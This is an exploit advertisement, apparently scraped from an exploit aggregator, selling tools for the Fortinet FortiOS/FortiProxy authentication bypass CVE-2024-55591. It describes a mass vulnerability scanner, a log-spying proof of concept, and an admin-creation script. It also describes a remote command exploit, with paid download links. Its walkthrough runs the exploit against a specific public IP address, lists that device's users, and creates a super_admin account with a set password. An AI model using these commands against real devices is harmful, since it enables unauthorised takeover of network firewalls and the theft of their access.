Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy CVE-2024-55591

Name: Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet Fortiproxy CVE-2024-55591
Rating: 5 (123 reviews)
2025-01-25 | CVSS 9.8
## https://sploitus.com/exploit?id=A91322A5-4A8F-53D6-82F4-3D77EE20F151
# CVE-2024-55591
### If you're reading this, you most likely know what we're talking about.
[DOWNLOAD](https://satoshidisk.com/pay/CNfsqE)
# Vulnerability Scanner
## Description
This script attempts to create a WebSocket connection at a random URL from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is VULNERABLE.
### Checks the file with ip addresses for vulnerability
## USEAGE
Checks your text document with ip addresses for vulnerabilities
```python3 check.py --file ips.txt --port 443```


# poc.py (Event Listening and Tracking)
## Description
Use this poc, you can bypass authentication and see system log.
## USAGE
Opens the listener, shows all actions performed on the server.
```python3 poc.py --target TARGET```

You can also customize the activity tracking setting and put a filter on the tasks you need to do.

![image](https://github.com/user-attachments/assets/2790e355-9640-45c1-b358-30b131bdaa81)

Replace * with the action you wish to track ```LOG_ID_ADMIN_LOGIN_SUCC```
Shows only successful administrator logins 

# ADMIN CREATION
## Description
Use this exp, you can Сreates administrator, adding an administrator to a VPN group.
## USEAGE
Set the required IP Address in the code before startup.

![image](https://github.com/user-attachments/assets/896d0c6a-67d2-4234-bf47-5bcc91f8d7f4)

```python3 adadmin.py```

![image](https://github.com/user-attachments/assets/a1978c49-3b08-4be9-aabd-2140b3d19c22)


# CMD
## Description
Use this exp, you can bypass authentication and run cmd.
## USEAGE
```exp.py --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]```

## Affected Versions

-FortiOS 7.0.0 through 7.0.16

-FortiProxy 7.0.0 through 7.0.19

-FortiProxy 7.2.0 through 7.2.12

[More details](https://www.fortiguard.com/psirt/FG-IR-24-535)

[DOWNLOAD](https://satoshidisk.com/pay/CNfsqE)

# USAGE INSTRUCTIONS

## Vulnerability Scanner

I use remote server for work, operating system is ubuntu. 

Update server:
```markdown
sudo apt update & sudo apt upgrade -y
```

python install:
```markdown
sudo apt install python3
```

version check:
```markdown
python3 --version
```

install pip:
```markdown
sudo apt install python3-pip
```

pip version check:
```markdown
pip3 --version
```

install screen:
```markdown
sudo apt install screen
```


mk dir for scrypt's:
```markdown
mkdir scrypts
```

creating a folder, moving to a folder:
```markdown
cd scrypts
```

move the scripts and related files to the folder

install venv package:
```markdown
apt install python3.10-venv
```

create a virtual environment:
```markdown
python3 -m venv pintest
```

venv activation:
```markdown
source pintest/bin/activate
```

install lib's:
```markdown
pip install requests
```

start cheker scrypt:
```markdown
python3 checker.py --file ips.txt --port 443
```

It is important that the file in which the ip addresses of the targets are written should be located in the script directory.

![image](https://github.com/user-attachments/assets/b542b587-38d0-47e1-a9f0-b2d43bec2afc)


# Using POC to monitor events
I will be using a previously configured system to use the scripts, for this reason I will go straight to the description of the workflow rather than the system configuration.

poc.py script requires more libraries, let's install the necessary ones:
```markdown
pip install pwntools
```
run the code. Set your surveillance data:
```markdown
python3 poc.py --target TARGET
```

I think I witnessed someone brute-forcing this server.

![image](https://github.com/user-attachments/assets/e2416532-3c44-4ad7-a8aa-deed4961aa0d)

# ##########################################################################################################
The code that allows you to create an Administrator and add him to a VPN group, as well as the code that opens the command line you can get HERE [DOWNLOAD](https://satoshidisk.com/pay/CNbsC7)
## CLI ON THE FORTINET
add the necessary libraries:
```markdown
pip install websocket
```
```markdown
pip install websocket-client
```
The first thing we want to check is to check our admin accounts, add them and view them. to do this I suggest sending a command to the server that will show us all the users that are registered in this system

```markdown
python3 exp.py --host 5.172.67.204  --port 443 --command "show user local" --ssl
```
![image](https://github.com/user-attachments/assets/49c9b5b7-c897-41be-84f1-3b0e0615ae97)
![image](https://github.com/user-attachments/assets/d349a258-76d1-4597-af71-832211c9e144)

To make sure that we create a new network administrator - call it by its new name - run the following command

```markdown
python3 exp.py --host 5.172.67.204 --port 443 --command "config user local
edit bitshift
set type password
set passwd Githubrobomusk
set accprofile super_admin
next
end" --ssl
```
![image](https://github.com/user-attachments/assets/7b221158-ad31-40c1-b796-038d2b20eeab)

and then repeat the command again, which displays the list of network users
```markdown
python3 exp.py --host 5.172.67.204  --port 443 --command "show user local" --ssl
```
![image](https://github.com/user-attachments/assets/bf1b7bf3-89c8-4542-8f64-49638dc04fd4)

With working access to the fortinet CLI we can do anything. to download additional materials, CLI commands and other related stuff, as well as contact me you can here

[DOWNLOAD](https://satoshidisk.com/pay/CNfsqE)